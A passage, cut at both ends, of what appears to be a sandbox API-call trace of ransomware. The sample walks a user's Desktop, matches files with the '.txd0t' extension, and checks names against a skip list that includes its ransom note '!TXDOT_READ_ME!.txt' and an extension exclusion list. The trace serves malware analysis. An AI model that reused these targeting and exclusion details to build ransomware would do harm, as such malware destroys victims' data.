dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="7SFq.jpg.txd0t", cAlternateFileName="7SFQJP~1.TXD")) returned 1 [0129.181] StrCmpW (psz1="7SFq.jpg.txd0t", psz2=".") returned 1 [0129.181] StrCmpW (psz1="7SFq.jpg.txd0t", psz2="..") returned 1 [0129.181] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.181] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="7SFq.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t" [0129.182] PathFindExtensionW (pszPath="7SFq.jpg.txd0t") returned=".txd0t" [0129.182] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.182] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61556450, ftCreationTime.dwHighDateTime=0x1d5e686, ftLastAccessTime.dwLowDateTime=0xaf323a40, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0x5072091b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x30f9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8dOKYe-qP.odt.txd0t", cAlternateFileName="8DOKYE~1.TXD")) returned 1 [0129.182] StrCmpW (psz1="8dOKYe-qP.odt.txd0t", psz2=".") returned 1 [0129.182] StrCmpW (psz1="8dOKYe-qP.odt.txd0t", psz2="..") returned 1 [0129.182] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="8dOKYe-qP.odt.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t" [0129.182] PathFindExtensionW (pszPath="8dOKYe-qP.odt.txd0t") returned=".txd0t" [0129.182] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.182] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x177c8af0, ftCreationTime.dwHighDateTime=0x1d5e304, ftLastAccessTime.dwLowDateTime=0x2eadcbd0, ftLastAccessTime.dwHighDateTime=0x1d5e25f, ftLastWriteTime.dwLowDateTime=0x50749f18, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14903, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aqQlS_nJ46AyT-L-zj.swf.txd0t", cAlternateFileName="AQQLS_~1.TXD")) returned 1 [0129.182] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf.txd0t", psz2=".") returned 1 [0129.182] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf.txd0t", psz2="..") returned 1 [0129.182] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="aqQlS_nJ46AyT-L-zj.swf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t" [0129.182] PathFindExtensionW (pszPath="aqQlS_nJ46AyT-L-zj.swf.txd0t") returned=".txd0t" [0129.182] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.182] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87888bb0, ftCreationTime.dwHighDateTime=0x1d5e20e, ftLastAccessTime.dwLowDateTime=0xae94e950, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0x50749f18, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x948a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="BBeZnteC-7.mp3.txd0t", cAlternateFileName="BBEZNT~1.TXD")) returned 1 [0129.182] StrCmpW (psz1="BBeZnteC-7.mp3.txd0t", psz2=".") returned 1 [0129.182] StrCmpW (psz1="BBeZnteC-7.mp3.txd0t", psz2="..") returned 1 [0129.182] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="BBeZnteC-7.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t" [0129.182] PathFindExtensionW (pszPath="BBeZnteC-7.mp3.txd0t") returned=".txd0t" [0129.182] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.182] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a3c340, ftCreationTime.dwHighDateTime=0x1d5e121, ftLastAccessTime.dwLowDateTime=0x9bb095a0, ftLastAccessTime.dwHighDateTime=0x1d5e9f8, ftLastWriteTime.dwLowDateTime=0x5076cdac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5554, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Cb9DBpMZ2 ZiZd.jpg.txd0t", cAlternateFileName="CB9DBP~1.TXD")) returned 1 [0129.182] StrCmpW (psz1="Cb9DBpMZ2 ZiZd.jpg.txd0t", psz2=".") returned 1 [0129.182] StrCmpW (psz1="Cb9DBpMZ2 ZiZd.jpg.txd0t", psz2="..") returned 1 [0129.182] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.182] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Cb9DBpMZ2 ZiZd.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t" [0129.183] PathFindExtensionW (pszPath="Cb9DBpMZ2 ZiZd.jpg.txd0t") returned=".txd0t" [0129.183] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.183] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c9bb00, ftCreationTime.dwHighDateTime=0x1d5e7c6, ftLastAccessTime.dwLowDateTime=0xadea1ed0, ftLastAccessTime.dwHighDateTime=0x1d5eee9, ftLastWriteTime.dwLowDateTime=0x5076cdac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd5f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CyLY.bmp.txd0t", cAlternateFileName="CYLYBM~1.TXD")) returned 1 [0129.183] StrCmpW (psz1="CyLY.bmp.txd0t", psz2=".") returned 1 [0129.183] StrCmpW (psz1="CyLY.bmp.txd0t", psz2="..") returned 1 [0129.183] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="CyLY.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t" [0129.183] PathFindExtensionW (pszPath="CyLY.bmp.txd0t") returned=".txd0t" [0129.183] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.183] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e49bf0, ftCreationTime.dwHighDateTime=0x1d5e5d9, ftLastAccessTime.dwLowDateTime=0xff29c150, ftLastAccessTime.dwHighDateTime=0x1d5e1e3, ftLastWriteTime.dwLowDateTime=0x50792fe4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x49e2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DE3scvajpXnclcE34.xls.txd0t", cAlternateFileName="DE3SCV~1.TXD")) returned 1 [0129.183] StrCmpW (psz1="DE3scvajpXnclcE34.xls.txd0t", psz2=".") returned 1 [0129.183] StrCmpW (psz1="DE3scvajpXnclcE34.xls.txd0t", psz2="..") returned 1 [0129.183] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="DE3scvajpXnclcE34.xls.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t" [0129.183] PathFindExtensionW (pszPath="DE3scvajpXnclcE34.xls.txd0t") returned=".txd0t" [0129.183] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.183] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.183] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.183] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.183] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e2a550, ftCreationTime.dwHighDateTime=0x1d5eca3, ftLastAccessTime.dwLowDateTime=0xc61bbc60, ftLastAccessTime.dwHighDateTime=0x1d5e828, ftLastWriteTime.dwLowDateTime=0x50792fe4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="GHZr_0qE96Rjj.avi.txd0t", cAlternateFileName="GHZR_0~1.TXD")) returned 1 [0129.183] StrCmpW (psz1="GHZr_0qE96Rjj.avi.txd0t", psz2=".") returned 1 [0129.183] StrCmpW (psz1="GHZr_0qE96Rjj.avi.txd0t", psz2="..") returned 1 [0129.183] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="GHZr_0qE96Rjj.avi.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t" [0129.183] PathFindExtensionW (pszPath="GHZr_0qE96Rjj.avi.txd0t") returned=".txd0t" [0129.183] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.183] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d77c440, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x28888e60, ftLastAccessTime.dwHighDateTime=0x1d5e8aa, ftLastWriteTime.dwLowDateTime=0x507b93c9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xc217, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="jhscRm6vvE.csv.txd0t", cAlternateFileName="JHSCRM~1.TXD")) returned 1 [0129.183] StrCmpW (psz1="jhscRm6vvE.csv.txd0t", psz2=".") returned 1 [0129.183] StrCmpW (psz1="jhscRm6vvE.csv.txd0t", psz2="..") returned 1 [0129.183] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.183] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="jhscRm6vvE.csv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t" [0129.184] PathFindExtensionW (pszPath="jhscRm6vvE.csv.txd0t") returned=".txd0t" [0129.184] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.184] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2255f40, ftCreationTime.dwHighDateTime=0x1d5ed83, ftLastAccessTime.dwLowDateTime=0x5f6fb860, ftLastAccessTime.dwHighDateTime=0x1d5f01e, ftLastWriteTime.dwLowDateTime=0x507df3de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1727a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="K7u1HHJ_-wyjZGJCddO.doc.txd0t", cAlternateFileName="K7U1HH~1.TXD")) returned 1 [0129.184] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc.txd0t", psz2=".") returned 1 [0129.184] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc.txd0t", psz2="..") returned 1 [0129.184] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.184] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.184] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="K7u1HHJ_-wyjZGJCddO.doc.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t" [0129.184] PathFindExtensionW (pszPath="K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned=".txd0t" [0129.184] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.184] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa575a7d0, ftCreationTime.dwHighDateTime=0x1d5e5aa, ftLastAccessTime.dwLowDateTime=0x34fdb140, ftLastAccessTime.dwHighDateTime=0x1d5ecb3, ftLastWriteTime.dwLowDateTime=0x507df3de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa51c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="lDvQFP7B58nzHOr.m4a.txd0t", cAlternateFileName="LDVQFP~1.TXD")) returned 1 [0129.184] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a.txd0t", psz2=".") returned 1 [0129.184] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a.txd0t", psz2="..") returned 1 [0129.184] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.184] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.184] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="lDvQFP7B58nzHOr.m4a.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t" [0129.184] PathFindExtensionW (pszPath="lDvQFP7B58nzHOr.m4a.txd0t") returned=".txd0t" [0129.184] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.184] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2419ea80, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x2419ea80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x22502700, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x27000, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mspusf.exe", cAlternateFileName="")) returned 1 [0129.184] StrCmpW (psz1="mspusf.exe", psz2=".") returned 1 [0129.184] StrCmpW (psz1="mspusf.exe", psz2="..") returned 1 [0129.184] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.184] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.184] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="mspusf.exe", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe") returned="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe" [0129.184] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0129.184] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="bootsect.bak") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="iconcache.db") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="thumbs.db") returned -1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2=" ransomware ") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2=" ransom ") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="debug.txt") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="boot.ini") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="desktop.ini") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="autorun.inf") returned 1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="ntuser.dat") returned -1 [0129.184] StrCmpIW (psz1="mspusf.exe", psz2="ntldr") returned -1 [0129.185] StrCmpIW (psz1="mspusf.exe", psz2="ntdetect.com") returned -1 [0129.185] StrCmpIW (psz1="mspusf.exe", psz2="bootfont.bin") returned 1 [0129.185] StrCmpIW (psz1="mspusf.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.185] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0129.185] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0129.185] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0152430, ftCreationTime.dwHighDateTime=0x1d5edf5, ftLastAccessTime.dwLowDateTime=0xc2c01df0, ftLastAccessTime.dwHighDateTime=0x1d5f02e, ftLastWriteTime.dwLowDateTime=0x50a8df2a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14166, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OifmxvKJj07hQoi0y.ppt.txd0t", cAlternateFileName="OIFMXV~1.TXD")) returned 1 [0129.185] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt.txd0t", psz2=".") returned 1 [0129.185] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt.txd0t", psz2="..") returned 1 [0129.185] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OifmxvKJj07hQoi0y.ppt.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t" [0129.185] PathFindExtensionW (pszPath="OifmxvKJj07hQoi0y.ppt.txd0t") returned=".txd0t" [0129.185] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.185] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b5ea80, ftCreationTime.dwHighDateTime=0x1d5e858, ftLastAccessTime.dwLowDateTime=0x79ba9ae0, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0x508059ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16085, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="oIyEk1tbor7X9s.bmp.txd0t", cAlternateFileName="OIYEK1~1.TXD")) returned 1 [0129.185] StrCmpW (psz1="oIyEk1tbor7X9s.bmp.txd0t", psz2=".") returned 1 [0129.185] StrCmpW (psz1="oIyEk1tbor7X9s.bmp.txd0t", psz2="..") returned 1 [0129.185] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="oIyEk1tbor7X9s.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t" [0129.185] PathFindExtensionW (pszPath="oIyEk1tbor7X9s.bmp.txd0t") returned=".txd0t" [0129.185] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.185] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf7020, ftCreationTime.dwHighDateTime=0x1d5f060, ftLastAccessTime.dwLowDateTime=0xb76abe30, ftLastAccessTime.dwHighDateTime=0x1d5ee2e, ftLastWriteTime.dwLowDateTime=0x5082b988, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaef5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OO_s81.avi.txd0t", cAlternateFileName="OO_S81~1.TXD")) returned 1 [0129.185] StrCmpW (psz1="OO_s81.avi.txd0t", psz2=".") returned 1 [0129.185] StrCmpW (psz1="OO_s81.avi.txd0t", psz2="..") returned 1 [0129.185] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.185] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OO_s81.avi.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\OO_s81.avi.txd0t" [0129.185] PathFindExtensionW (pszPath="OO_s81.avi.txd0t") returned=".txd0t" [0129.185] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.185] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c778d70, ftCreationTime.dwHighDateTime=0x1d5e836, ftLastAccessTime.dwLowDateTime=0x91a2deb0, ftLastAccessTime.dwHighDateTime=0x1d5ee67, ftLastWriteTime.dwLowDateTime=0x5082b988, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xea8a, dwReserved0=0x550e9f, 